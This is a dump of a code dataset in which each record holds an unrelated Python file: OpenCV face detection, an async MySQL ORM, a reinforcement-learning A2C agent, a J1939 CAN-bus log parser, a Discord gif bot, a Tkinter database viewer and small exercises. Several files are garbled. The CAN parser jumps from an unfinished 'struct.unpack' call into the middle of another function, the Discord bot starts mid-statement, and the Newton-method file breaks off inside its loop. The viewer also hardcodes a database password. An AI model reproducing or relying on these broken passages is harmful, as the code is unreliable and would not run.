cms.InputTag(\"offlineBeamSpot\"),\n)\n\n","sub_path":"NtupleMaker/python/electronMaker_cfi.py","file_name":"electronMaker_cfi.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"409450526","text":"import cv2\nimport numpy as np\n\nfaceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\nvideo_capture = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(gray,1.3,5)\n\n # Draw a rectangle around the faces\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y), (x+w,y+h), (255,0,0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n eyes=eye_cascade.detectMultiScale(roi_gray)\n for(ex,ey,ew,eh) in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv2.imshow('frame',frame)\n k=cv2.waitKey(30) & 0xff\n if k==27:\n break\n\n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"493354689","text":"# day 3 ORM\n# 异步部分\nimport logging\nlogging.basicConfig(level=logging.INFO)\nimport aiomysql\n\nasync def create_pool(loop, **kw):\n logging.info('create database connection pool...')\n global __pool\n __pool = await aiomysql.create_pool(\n host = kw.get('host', 'localhost'),\n port = kw.get('port', 3306),\n user = kw['user'],\n password = kw.get('pw',None) or kw.get('password', None),\n db = kw.get('db',None) or kw.get('database', None),\n charset = kw.get('charset', 'utf8'),\n autocommit = kw.get('autocommit', True),\n maxsize = kw.get('maxsize', 10),\n minsize = kw.get('minsize',1),\n loop = loop\n )\n\nasync def select(sql, args, size = None):\n logging.info(sql)\n global __pool\n with (await __pool) as conn:\n cur = await conn.cursor(aiomysql.DictCursor)\n await cur.execute(sql.replace('?', '%s'), args or ())\n if size:\n rs = await cur.fetchmany(size)\n else:\n rs = await cur.fetchall()\n await cur.close()\n logging.info('return %s lines' %len(rs))\n return rs\n\nasync def execute(sql, args):\n logging.info(sql)\n global __pool\n with (await __pool) as conn:\n try:\n cur = await conn.cursor(aiomysql.DictCursor)\n await cur.execute(sql.replace('?', '%s'), args)\n affected = cur.rowcount\n await cur.close()\n except BaseException as e:\n raise e\n return affected \n\n# ORM部分\nclass Field(object):\n def __init__(self, name, column_type, primary_key, default):\n self.name = name\n self.column_type = column_type\n self.primary_key = primary_key\n self.default = default\n def __str__(self):\n return '<%s, %s: %s>' %(self.__class__.__name__, self.column_type, self.name)\nclass StringField(Field):\n def __init__(self, name=None, column_type='varchar(50)',primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\n # 等同于 super(StringField, self)...\nclass IntegerField(Field):\n def __init__(self, name=None, column_type='bigint', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\nclass BooleanField(Field):\n def __init__(self, name=None, column_type='tinyint(1)', primary_key=False, default=None):\n super().__init__(name, column_type, 
primary_key, default)\nclass TextField(Field):\n def __init__(self, name=None, column_type='text', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\nclass FloatField(Field):\n def __init__(self, name=None, column_type='floatfield(16,6)', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\n\nclass ModelMetaclass(type):\n def __new__(cls, name, base, attrs):\n if name == 'Model':\n return type.__new__(cls, name, base, attrs)\n table_name = attrs.get('__table__', None) or name \n logging.info('Find Model: %s' %name)\n mappings = dict()\n fields = []\n primary_key = None \n for k, v in attrs.items():\n if isinstance(v, Field):\n logging.info('Find Mapping: %s -> %s' %(k, v))\n mappings[k] = v\n if v.primary_key:\n if primary_key:\n raise RuntimeError('Duplicate primary key in field %s and %s' %(primary_key, key))\n else:\n primary_key = k\n else:\n fields.append(k)\n if not primary_key:\n raise RuntimeError('Primary key not found')\n for k in mappings:\n attrs.pop(k)\n escaped_fields = list(map(lambda f: \"`%s`\" %f, fields))\n attrs['__mappings__'] = mappings\n attrs['__table__'] = table_name\n attrs['__primary_key__'] = primary_key\n attrs['__fields__'] = fields\n # 默认的select, insert, update, delete\n attrs['__select__'] = \"select `%s`, %s from `%s`\" %(primary_key, ', '.join(escaped_fields), table_name) \n attrs['__insert__'] = \"insert into `%s` (%s, %s) values (%s)\" %(\n table_name, ', '.join(escaped_fields), primary_key, '?'+',?' * len(escaped_fields))\n attrs['__update__'] = \"update `%s` set %s where `%s`=? \" %(\n table_name, ', '.join(map(lambda f: \"`%s`=?\" % (mappings.get(f).name or f), fields)), primary_key)\n attrs['__delete__'] = \"delete from %s where `%s`=?\" %(table_name, primary_key)\n return type.__new__(cls, name, base, attrs)\n\nclass Model(dict, metaclass = ModelMetaclass):\n def __init__(self, **kw):\n super(Model, self).__init__(**kw)\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Model' object has no attribute %s\" %key)\n\n def __setattr__(self, key, value):\n self[key] = value\n \n def getValue(self, key):\n return getattr(self, key, None)\n\n def getValueOrDefault(self, key):\n value = getattr(self, key, None)\n if value == None:\n field = self.__mappings__[key]\n if field.default is not None:\n logging.debug('use default value for %s: %s' %(key, str(value)))\n value = field.default() if callable(field.default) else field.default\n setattr(self, key, value)\n return value\n\n # 类方法,让所有子类获得方法,例:user = await User.find('123')\n @classmethod\n async def find(cls, primary_key):\n # 按主键查找\n res = await select('%s where `%s`=?' 
% (cls.__select__, cls.__primary_key__), [primary_key], 1)\n if len(res) == 0:\n return None\n return cls(**res[0]) #返回的是fetchall的结果,所以是[[]]的形式;调用创建类的方法,将res[0]作为kw输入,以获得结果类\n \n # 保存\n async def save(self):\n args = list(map(self.getValueOrDefault, self.__fields__)) \n args.append(self.getValueOrDefault(self.__primary_key__))\n rows = await execute(self.__insert__, args)\n if rows != 1:\n logging.warn('failed to insert rows: affected rows: %s' %rows)\n\n # 自行实现部分:\n @classmethod\n async def __findWhere(cls, s = None, args = None):\n try:\n if not s:\n res = await select('%s' %cls.__select__, ())\n else:\n res = await select('%s where %s' % (cls.__select__, s), args)\n except:\n raise RuntimeError(\"Invalid input 'where' string: %s\" %s)\n if len(res)==0:\n return None\n return [cls(**row) for row in res] \n \n @classmethod\n async def findAll(cls, **kw):\n if len(kw) == 0:\n return await cls.__findWhere()\n fields = []\n args = []\n for key, value in kw.items():\n\n fields.append(key)\n args.append(value)\n s = ' AND '.join(map(lambda f: f+'=?', fields))\n return await cls.__findWhere(s, args)\n\n @classmethod\n async def findAny(cls, **kw):\n fields = []\n args = []\n for key, value in kw.items():\n fields.append(key)\n args.append(value)\n s = ' OR '.join(map(lambda f: f+'=?', fields))\n return await cls.__findWhere(s, args)\n\n @classmethod\n async def delete(cls, primary_key):\n # 按主键删除\n affected = await execute(cls.__delete__, primary_key)\n if affected!=1:\n raise RuntimeError('failed to delete row: affected %s lines' %affected)\n\n async def remove(self):\n # 删除实例\n primary_key = self.getValue(self.__primary_key__)\n affected = await execute(self.__delete__, primary_key)\n if affected!=1:\n raise RuntimeError('failed to delete row: affected %s lines' %affected)\n \n","sub_path":"awesome-python3-webapp/www/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"457381003","text":"import sys\nfrom cx_Freeze import setup, Executable\n\n__author__ = 'Gareth Mok'\n\n# -*- coding: utf-8 -*-\n\n# A simple setup script to create an executable using PyQt4. 
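(The include_files list below bundles the app's .ui layouts, credit.txt, and the PNG artwork it loads at runtime, so they ship next to the executable.)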
This also\n# demonstrates the method for creating a Windows executable that does not have\n# an associated console.\n#\n# PyQt4app.py is a very simple type of PyQt4 application\n#\n# Run the build process by running the command 'python setup.py build'\n#\n# If everything works well you should find a subdirectory in the build\n# subdirectory that contains the files needed to run the application\n\n\nbase = None\nif sys.platform == 'win32':\n base = 'Win32GUI'\n\noptions = {\n 'build_exe': {\n 'includes': ['atexit', 'PyQt4'],\n 'include_files': ['credit.txt', 'add_remove_account.ui', 'add_remove_entry.ui',\n 'frame.ui', 'get_database_type.ui', 'get_start_date.ui', 'main.ui',\n 'White_Background_Annuity.png'],\n }\n}\n\nexecutables = [\n Executable('gui_main.py', base=base,\n targetName='Account_Recorder.exe')\n]\n\nincludes = ['PyQt4', 'datetime', 'json', 'os', 'pyqtgraph', 'sys']\n\nsetup(name='Account Recoder',\n version='0.1',\n description='Keeps a simple record of money accounts',\n options=options,\n install_requires=['PyQt4', 'pyqtgraph'],\n executables=executables\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"292116121","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as opt\nfrom torch.autograd import Variable\nimport gym\n\nfrom genrl.deep.common import get_model, save_params, load_params, set_seeds, venv\nfrom typing import Union, Tuple, Any, Optional, Dict\n\n\nclass A2C:\n \"\"\"\n Advantage Actor Critic algorithm (A2C)\n The synchronous version of A3C\n Paper: https://arxiv.org/abs/1602.01783\n\n :param network_type: The deep neural network layer types ['mlp']\n :param env: The environment to learn from\n :param gamma: Discount factor\n :param actor_batch_size: Update batch size\n :param lr_actor: Policy Network learning rate\n :param lr_critic: Value Network learning rate\n :param num_episodes: Number of episodes\n :param timesteps_per_actorbatch: Number of timesteps per epoch\n :param max_ep_len: Maximum timesteps in an episode\n :param layers: Number of neurons in hidden layers\n :param noise: Noise function to use\n :param noise_std: Standard deviation for action noise\n :param tensorboard_log: The log location for Tensorboard\\\n(if None, no logging)\n :param seed: Seed for reproducing results\n :param render: True if environment is to be rendered, else False\n :param device: Device to use for Tensor operation ['cpu', 'cuda']\n :param run_num: Model run number if it has already been trained\n :param save_model: Directory the user wants to save models to\n :param save_interval: Number of steps between saves of models\n :type network_type: string\n :type env: Gym Environment\n :type gamma: float\n :type actor_batch_size: int\n :type lr_a: float\n :type lr_c: float\n :type num_episodes: int\n :type timesteps_per_actorbatch: int\n :type max_ep_len: int\n :type layers: tuple or list\n :type noise: function\n :type noise_std: float\n :type tensorboard_log: string\n :type seed: int\n :type render: boolean\n :type device: string\n :type run_num: int\n :type save_model: string\n :type save_interval: int\n \"\"\"\n\n def __init__(\n self,\n network_type: str,\n env: Union[gym.Env, venv],\n gamma: float = 0.99,\n actor_batch_size: int = 64,\n lr_actor: float = 0.01,\n lr_critic: float = 0.1,\n num_episodes: int = 100,\n timesteps_per_actorbatch: int = 4000,\n max_ep_len: int = 1000,\n layers: Tuple = 
(32, 32),\n noise: Any = None,\n noise_std: float = 0.1,\n tensorboard_log: str = None,\n seed: Optional[int] = None,\n render: bool = False,\n device: Union[torch.device, str] = \"cpu\",\n run_num: int = None,\n save_model: str = None,\n save_interval: int = 1000,\n ):\n self.network_type = network_type\n self.env = env\n self.gamma = gamma\n self.actor_batch_size = actor_batch_size\n self.lr_actor = lr_actor\n self.lr_critic = lr_critic\n self.num_episodes = num_episodes\n self.timesteps_per_actorbatch = timesteps_per_actorbatch\n self.max_ep_len = max_ep_len\n self.layers = layers\n self.noise = noise\n self.noise_std = noise_std\n self.tensorboard_log = tensorboard_log\n self.seed = seed\n self.render = render\n self.run_num = run_num\n self.save_interval = save_interval\n self.save_model = None\n self.save = save_params\n self.load = load_params\n\n # Assign device\n if \"cuda\" in device and torch.cuda.is_available():\n self.device = torch.device(\"cuda\")\n else:\n self.device = torch.device(\"cpu\")\n\n # Assign seed\n if seed is not None:\n set_seeds(seed, self.env)\n\n # Setup tensorboard writer\n self.writer = None\n if self.tensorboard_log is not None: # pragma: no cover\n from torch.utils.tensorboard import SummaryWriter\n\n self.writer = SummaryWriter(log_dir=self.tensorboard_log)\n\n self.create_model()\n\n def create_model(self) -> None:\n \"\"\"\n Creates actor critic model and initialises optimizers\n \"\"\"\n (state_dim, action_dim, discrete, action_lim) = self.get_env_properties()\n\n if self.noise is not None:\n self.noise = self.noise(\n np.zeros_like(action_dim), self.noise_std * np.ones_like(action_dim)\n )\n\n self.ac = get_model(\"ac\", self.network_type)(\n state_dim, action_dim, self.layers, \"V\", discrete, action_lim=action_lim\n ).to(self.device)\n\n self.actor_optimizer = opt.Adam(self.ac.actor.parameters(), lr=self.lr_actor)\n\n self.critic_optimizer = opt.Adam(self.ac.critic.parameters(), lr=self.lr_critic)\n\n self.traj_reward = []\n self.actor_hist = torch.Tensor().to(self.device)\n self.critic_hist = torch.Tensor().to(self.device)\n\n self.actor_loss_hist = torch.Tensor().to(self.device)\n self.critic_loss_hist = torch.Tensor().to(self.device)\n\n # load paramaters if already trained\n if self.run_num is not None:\n self.load(self)\n self.ac.actor.load_state_dict(self.checkpoint[\"actor_weights\"])\n self.ac.critic.load_state_dict(self.checkpoint[\"critic_weights\"])\n for key, item in self.checkpoint.items():\n if key not in [\"actor_weights\", \"critic_weights\"]:\n setattr(self, key, item)\n print(\"Loaded pretrained model\")\n\n def select_action(\n self, state: np.ndarray, deterministic: bool = True\n ) -> np.ndarray:\n \"\"\"\n Selection of action\n\n :param state: Observation state\n :param deterministic: Action selection type\n :type state: int, float, ...\n :type deterministic: bool\n :returns: Action based on the state and epsilon value\n :rtype: int, float, ...\n \"\"\"\n state = torch.as_tensor(state).float().to(self.device)\n\n action, distribution = self.ac.get_action(state)\n log_prob = distribution.log_prob(action)\n value = self.ac.get_value(state)\n\n self.actor_hist = torch.cat([self.actor_hist, log_prob.unsqueeze(0)])\n self.critic_hist = torch.cat([self.critic_hist, value.unsqueeze(0)])\n\n action = action.detach().cpu().numpy()\n\n if self.noise is not None:\n action += self.noise()\n\n return action\n\n def get_traj_loss(self) -> None:\n \"\"\"\n Get trajectory of agent to calculate discounted rewards and \\\ncalculate losses\n 
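(Uses the standard discounted-return recursion G_t = r_t + gamma * G_{t+1}, accumulated by walking self.traj_reward in reverse.)\n        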
\"\"\"\n discounted_reward = 0\n returns = []\n\n for reward in self.traj_reward[::-1]:\n discounted_reward = reward + self.gamma * discounted_reward\n returns.insert(0, discounted_reward)\n\n returns = torch.FloatTensor(returns).to(self.device)\n advantages = Variable(returns) - Variable(self.critic_hist)\n\n actor_loss = torch.mean(torch.mul(advantages, self.actor_hist.mul(-1)))\n\n critic_loss = nn.MSELoss()(self.critic_hist, Variable(returns))\n\n self.actor_loss_hist = torch.cat(\n [self.actor_loss_hist, actor_loss.unsqueeze(0)]\n )\n self.critic_loss_hist = torch.cat(\n [self.critic_loss_hist, critic_loss.unsqueeze(0)]\n )\n\n self.traj_reward = []\n self.actor_hist = torch.Tensor().to(self.device)\n self.critic_hist = torch.Tensor().to(self.device)\n\n def update(self, episode: int) -> None:\n \"\"\"\n Updates actor and critic model parameters\n\n :param episode: Number of the episode at which the agent is training\n :type episode: int\n \"\"\"\n actor_loss = torch.mean(self.actor_loss_hist)\n critic_loss = torch.mean(self.critic_loss_hist)\n\n if self.tensorboard_log:\n self.writer.add_scalar(\"loss/actor\", self.actor_loss, episode)\n self.writer.add_scalar(\"loss/critic\", self.actor_loss, episode)\n\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n self.actor_loss_hist = torch.Tensor().to(self.device)\n self.critic_loss_hist = torch.Tensor().to(self.device)\n\n def learn(self): # pragma: no cover\n \"\"\"\n Trains actor critic model\n \"\"\"\n for episode in range(self.num_episodes):\n episode_reward = 0\n steps = []\n for i in range(self.actor_batch_size):\n state = self.env.reset()\n done = False\n\n for t in range(self.timesteps_per_actorbatch):\n action = self.select_action(state)\n state, reward, done, _ = self.env.step(action)\n\n if self.render:\n self.env.render()\n\n self.traj_reward.append(reward)\n\n if done:\n steps.append(t)\n break\n\n episode_reward += np.sum(self.traj_reward) / self.actor_batch_size\n self.get_traj_loss()\n\n self.update(episode)\n\n if episode % 5 == 0:\n print(\"Episode: {}, Reward: {}\".format(episode, episode_reward))\n if self.tensorboard_log:\n self.writer.add_scalar(\"reward\", episode_reward, episode)\n\n if self.save_model is not None:\n if episode % self.save_interval == 0:\n self.checkpoint = self.get_hyperparams()\n self.save(self, episode)\n print(\"Saved current model\")\n\n self.env.close()\n if self.tensorboard_log:\n self.writer.close()\n\n def get_env_properties(self):\n \"\"\"\n Helper function to extract the observation and action space\n\n :returns: Observation space, Action Space and whether the action \\\nspace is discrete or not\n :rtype: int, float, ... ; int, float, ... 
; bool\n \"\"\"\n state_dim = self.env.observation_space.shape[0]\n\n if isinstance(self.env.action_space, gym.spaces.Discrete):\n action_dim = self.env.action_space.n\n disc = True\n action_lim = None\n elif isinstance(self.env.action_space, gym.spaces.Box):\n action_dim = self.env.action_space.shape[0]\n action_lim = self.env.action_space.high[0]\n disc = False\n else:\n raise NotImplementedError\n\n return state_dim, action_dim, disc, action_lim\n\n def get_hyperparams(self) -> Dict[str, Any]:\n \"\"\"\n Loads important hyperparameters that need to be loaded or saved\n\n :returns: Hyperparameters that need to be saved or loaded\n :rtype: dict\n \"\"\"\n hyperparams = {\n \"network_type\": self.network_type,\n \"timesteps_per_actorbatch\": self.timesteps_per_actorbatch,\n \"gamma\": self.gamma,\n \"actor_batch_size\": self.actor_batch_size,\n \"lr_actor\": self.lr_actor,\n \"lr_critic\": self.lr_critic,\n \"actor_weights\": self.ac.actor.state_dict(),\n \"critic_weights\": self.ac.critic.state_dict(),\n }\n\n return hyperparams\n\n\nif __name__ == \"__main__\":\n env = gym.make(\"CartPole-v0\")\n algo = A2C(\"mlp\", env)\n algo.learn()\n","sub_path":"genrl/deep/agents/a2c/a2c.py","file_name":"a2c.py","file_ext":"py","file_size_in_byte":11375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"328358480","text":"#!/usr/bin/env python3\nimport struct\nimport matplotlib.pyplot as plt\n\nPRIORITY_MASK = 0x1C000000\nPDU_FORMAT_MASK = 0x00FF0000\nPDU_SPECIFIC_MASK = 0x0000FF00 \nSOURCE_ADDRESS_MASK = 0x000000FF \nDATA_PAGE_MASK = 0x01000000 \nEXT_DATA_PAGE_MASK = 0x02000000 \nPDU1_PGN_MASK = 0x03FF0000 \nPDU2_PGN_MASK = 0x03FFFF00\n\nPRIORITY_OFFSET = 26 \nPDU_FORMAT_OFFSET = 16 \nDA_OFFSET = 8 \nPGN_OFFSET = 8\nPDU2_THRESHOLD = 240\n\nGLOBAL_SOURCE_ADDR = 0xFF\nENGINE_SA = 0\n\nCANDUMP_TIMESTAMP_ADDR = 0\nCANDUMP_CHANNEL_ADDR = 1\nCANDUMP_ID_ADDR = 2\nCANDUMP_DLC_ADDR = 3\nDATA_START_ADDR = 4\n\nPGN_EEC1 = 61444\n\nSPN190_SCALE = 0.125 #RPM/bit\nSPN190_OFFSET = 0\n\ndef main():\n spn190_times = []\n spn190_values = []\n filename = 'KWTruck.txt'\n with open(filename,'r') as f:\n for line in f:\n # We knew this data file was from Linux SocketCAN using candump.\n j1939_frame = parse_candump_line(line)\n # Add the additional results from parsing the id\n j1939_frame.update(parseJ1939id(j1939_frame['id']))\n transport_data = parseJ1939(j1939_frame)\n if transport_data is not None:\n j1939_frame.update(transport_data)\n # PGN for electronic engine control 1 messsage\n if (j1939_frame['pgn'] == PGN_EEC1 and \n j1939_frame[\"source_address\"] == ENGINE_SA): \n # Unpack the engine speed data in big endian format and \n # convert to engineering values\n rpm = (struct.unpack('> PRIORITY_OFFSET\n pf = (id & PDU_FORMAT_MASK) >> PDU_FORMAT_OFFSET\n if (pf < PDU2_THRESHOLD): # See SAE J1939-21\n # PDU 1 format uses values lower than 240\n da = (id & PDU_SPECIFIC_MASK) >> DA_OFFSET\n pgn = (id & PDU1_PGN_MASK) >> PGN_OFFSET\n else: # PDU 2 format\n da = GLOBAL_SOURCE_ADDR\n pgn = (id & PDU2_PGN_MASK) >> PGN_OFFSET\n return {'source_address': sa,\n 'priority': priority,\n 'destination_address': da,\n 'pgn': pgn}\n\ndef parse_candump_line(line):\n # Strip the newline characters and white space off the ends\n # then split the string into a list based on whitespace. \n data = line.strip().split() \n # can_dump formats use parenthese to wrap the floating\n # point timestamp. 
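A typical candump console line looks like \"(1436509052.249713) can1 18FEF100 [8] F0 7D 84 00 10 68 FF FF\"; the exact values here are only illustrative.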
We just want the numbers so use [1:-1] to slice\n time_stamp = float(data[CANDUMP_TIMESTAMP_ADDR][1:-1])\n # physical CAN channel\n channel = data[CANDUMP_CHANNEL_ADDR]\n # determine the can arbitration identifier as an integer\n can_id = int(data[CANDUMP_ID_ADDR],16)\n # Data length code is a single byte wrapped in []\n dlc = int(data[CANDUMP_DLC_ADDR][1])\n # Build the data field as a byte array\n data_bytes = b''\n for byte_string in data[DATA_START_ADDR:]:\n # Convert text into a single byte\n data_bytes += struct.pack('B',int(byte_string,16))\n #assert dlc == len(data_bytes)\n can_frame = {'id':can_id,\n 'dlc':dlc,\n 'data':data_bytes,\n 'timestamp':time_stamp,\n 'channel':channel}\n return can_frame\n\nTP_messages = {}\ndef parseJ1939(j1939_message):\n pgn = j1939_message['pgn']\n sa = j1939_message['source_address']\n da = j1939_message['destination_address']\n j1939_data_frame = j1939_message['data']\n if pgn == 0xEC00: #Transport Protocol Connection Management (TP.CM)\n control_byte = j1939_data_frame[0]\n if control_byte == 16: #Connection Mode Request to Send (TP.CM_RTS): Destination Specific\n message_size = struct.unpack('gifs_search_get: %s\\n\" % e\r\n\r\n#[BOT COMMANDS]:\r\n\r\n#for reacting to user\r\nasync def on_message(self,message):\r\n l=[\"hi\",\"Hi\",\"Hello\",\"hello\",\"Konichiwa\",\"konichiwa\",\"Bye\",\"bye\",\"sayonara\",\"Sayonara\"]\r\n if message.author!= self.user: \r\n if message.content in l:\r\n gif= await search_gifs(message)\r\n await message.channel.send(message+gif)\r\n\r\n#to check the guessed number\r\n@bot.command()\r\nasync def g(ctx,a):\r\n userID= ctx.author.mention\r\n #ID=userID.split(\"#\")\r\n #print(userID)\r\n\r\n if int(a)==r:\r\n rand()\r\n gif= await search_gifs(\"Clap\")\r\n await ctx.send(userID+\" Sugoi! \"+gif)\r\n \r\n else:\r\n await ctx.send(userID+\" Better luck next time!😢\")\r\n \r\n#to kill bot\r\n@bot.command()\r\nasync def kill(ctx):\r\n await ctx.send(\"Ahhhhhhh!\")\r\n await ctx.bot.logout()\r\n\r\n\r\n#print gif according to keyword\r\n@bot.command()\r\nasync def gif(ctx,e):\r\n gif = await search_gifs(e)\r\n await ctx.send('Gif URL : ' + gif)\r\n\r\nbot.run('token')\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"57140367","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nTest functions for models.GLM\n\"\"\"\n\nimport numpy as np\n\nfrom .. import family\nfrom ..glm import Model as GLM\n\nfrom nose.tools import assert_equal\n\nW = np.random.standard_normal\n\n\ndef test_Logistic():\n X = W((40,10))\n Y = np.greater(W((40,)), 0)\n cmodel = GLM(design=X, family=family.Binomial())\n results = cmodel.fit(Y)\n assert_equal(results.df_resid, 30)\n\n\ndef test_Logisticdegenerate():\n X = W((40,10))\n X[:,0] = X[:,1] + X[:,2]\n Y = np.greater(W((40,)), 0)\n cmodel = GLM(design=X, family=family.Binomial())\n results = cmodel.fit(Y)\n assert_equal(results.df_resid, 31)\n","sub_path":"nipy/algorithms/statistics/models/tests/test_glm.py","file_name":"test_glm.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"650914763","text":"import sys\r\n\r\ntry:\r\n\tfrom speech_gen import *\r\n\tfrom speech_rec import *\r\nexcept:\r\n\tsys.exit(\"Could not find speech_gen or speech_rec. 
Make sure all files made it.\")\r\n\r\ntry:\r\n\timport cleverwrap as cw\r\nexcept:\r\n\tsys.exit(\"Error importing libraries. Install \\\"cleverwrap\\\"\")\r\n\r\n#The log file.\r\nlog_file = \"log.txt\"\r\n\r\n#Where your cleverbot api key should go.\r\nCB_API_KEY = \"\"\r\n\r\n#Initialize the log file.\r\ntry:\r\n\tlog = open(log_file, \"a\")\r\nexcept:\r\n\tprint(\"!!!!Couldn't open log file for writing!!!!!\")\r\n\tsys.exit(-1)\r\n\r\n#Initialize the speech tools.\r\nsgInit()\r\nsrInit()\r\n\r\n#Initialize CleverBot\r\ntry:\r\n\tcb = cw.CleverWrap(CB_API_KEY)\r\nexcept:\r\n\tprint(\"!!!!Couldn't initialize CleverWrap!!!!!\")\r\n\tsys.exit(-3)\r\n\r\n#The speech that goes into and comes\r\n#out of cleverbot.\r\nin_speech = \"\"\r\nout_speech = \"\"\r\n\r\nlog.write(\"New conversation.\\n\")\r\n\r\n#Begin the main loop\r\nwhile True:\r\n\t#Gather microphone input and log it.\r\n\tin_speech = hear()\r\n\tlog.write(\"In: \" + in_speech + \"\\n\")\r\n\tprint(in_speech)\r\n\t\r\n\t#Gather Cleverbot's response, log it, and say it.\r\n\tout_speech = cb.say(in_speech)\r\n\tlog.write(\"Out: \" + out_speech + \"\\n\")\r\n\tprint(out_speech)\r\n\tsay(out_speech)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"338199421","text":"import mysql.connector\nimport tkinter.ttk as ttk\nfrom tkinter import *\n\nmy_db = mysql.connector.connect(\n host='localhost',\n user='root',\n password='123456',\n port='3306',\n database='moadb'\n)\n\nmy_cursor = my_db.cursor()\n\nroot = Tk()\nroot.geometry(\"725x450\")\n\nmain_frame = Frame(root)\nmain_frame.pack(fill=BOTH, expand=1)\n\nmy_canvas = Canvas(main_frame)\nmy_canvas.pack(side=LEFT, fill=BOTH, expand=1)\n\nmy_scrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=my_canvas.yview)\nmy_scrollbar.pack(side=RIGHT, fill=Y)\n\nmy_canvas.configure(yscrollcommand=my_scrollbar.set)\n\nmy_canvas.bind('', lambda e: my_canvas.configure(scrollregion=my_canvas.bbox(\"all\")))\n\nsecond_frame = Frame(my_canvas)\n\nmy_canvas.create_window((0, 0), window=second_frame, anchor=\"nw\")\n\ncolumn_list = [\"Match\", \"Date\", \"Side\", \"Top\", \"Jungle\", \"Mid\", \"ADC\", \"Support\", \"Result\"]\ni = 0\nfor column in column_list:\n c = Label(second_frame, width=13, text=column, relief=\"ridge\", borderwidth=2, font=\"helvetica 10 bold\")\n c.grid(row=0, column=i)\n i += 1\n\nquery = \"select id from gameresult\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ni = 1\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\", height=2)\n c.grid(row=i, column=0, rowspan=2)\n i += 2\nquery = \"select game_date from gameresult\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ngame_counts = (len(result))\ni = 1\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\", height=2)\n c.grid(row=i, column=1, rowspan=2)\n i += 2\n\nfor x in range(1, game_counts*2, 2):\n Label(second_frame, text=\"Red Team\", width=15, relief=\"ridge\").grid(row=x, column=2)\n Label(second_frame, text=\"Blue Team\", width=15, relief=\"ridge\").grid(row=x+1, column=2)\n\nquery = \"select top from redteam\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ni = 0\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\")\n c.grid(row=i+1, column=3)\n i += 2\n\nquery = \"select top from blueteam\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ni = 
1\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\")\n c.grid(row=i+1, column=3)\n i += 2\nroot.mainloop()","sub_path":"ViewGames.py","file_name":"ViewGames.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"3247895","text":"# EX 1\nint1 = 5\nint2 = 5\n\nstring1 = \"Hello\"\nstring2 = \"Hello\"\n\nfloat1 = 0.1\nfloat2 = 0.1\n\nprint(int1 is int2) # Output: True\nprint(string1 is string2) # Output: True\nprint(float1 is float2) # Output: True\n\n# EX 2\n\ndict1 = {\"name\": \"pipusna\", \"age\": \"26\"}\ndict2 = {\"name\": \"pipusna\", \"age\": \"26\"}\ndict3 = dict1\n\nprint(dict1 is dict3) # Output: True\nprint(dict1 is dict2) # Output: Flase\nprint(dict1 == dict2) # Output: True\n\n# Tuple, Set, List","sub_path":"Python Operators/Identity operators.py","file_name":"Identity operators.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"208026632","text":"# File: newton.py\n# Abraham Sharp\n# ECS 36 A\n#\n# Wai Hei Ngan\n#\n# Newton Method\nimport math\n\ndef newton(a,b,c):\n x=0 # initial guess\n for i in range (10): # run loop 10 times\n x = float(x) # convert x to floating points\n # newton method formula\n x= 